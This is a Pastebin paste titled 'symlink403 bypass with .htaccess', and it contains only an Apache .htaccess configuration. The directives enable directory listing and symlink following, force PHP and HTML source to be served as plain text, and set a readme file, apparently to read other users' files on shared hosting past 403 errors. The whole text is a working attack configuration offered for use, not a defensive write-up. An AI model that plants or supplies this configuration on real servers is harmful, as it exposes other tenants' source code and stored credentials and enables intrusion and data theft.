cookjamesharold

symlink403 bypass with .htaccess

Jan 20th, 2019
43
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.37 KB | None | 0 0
  1. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  2. Options Indexes FollowSymLinks
  3. ForceType text/plain
  4. AddType text/plain .php
  5. AddType text/plain .html
  6. AddType text/html .shtml
  7. AddType txt .php
  8. AddHandler server-parsed .php
  9. AddHandler txt .php
  10. AddHandler txt .html
  11. AddHandler txt .shtml
  12. Options All
  13. Options All
  14.  
  15. ReadMeName user.txt
Add Comment
Please, Sign In to add comment